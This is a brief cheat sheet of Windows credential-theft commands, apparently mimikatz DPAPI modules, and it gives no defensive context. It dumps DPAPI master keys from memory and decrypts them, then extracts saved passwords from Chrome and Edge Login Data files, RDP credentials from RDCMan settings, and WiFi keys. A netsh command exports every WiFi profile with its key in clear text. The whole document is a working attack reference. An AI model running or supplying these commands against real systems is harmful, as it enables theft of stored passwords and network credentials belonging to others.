๐ DPAPI & Protected Data
๐ DPAPI Master Keys
# Dump from memory
sekurlsa::dpapi
# Decrypt with password
dpapi::masterkey /in:masterkey_file /sid:S-1-5-21-XXX /password:Password123
# Dump Chrome passwords
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /masterkey:MASTERKEY
# Edge passwords
dpapi::edge /in:"%localappdata%\Microsoft\Edge\User Data\Default\Login Data"
๐ป RDP Credentials
# Dump RDP credentials
dpapi::rdg /in:"%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"
๐ถ WiFi Passwords
# Dump WiFi passwords
dpapi::wifi
# Export all profiles
netsh wlan export profile key=clear folder=C:\temp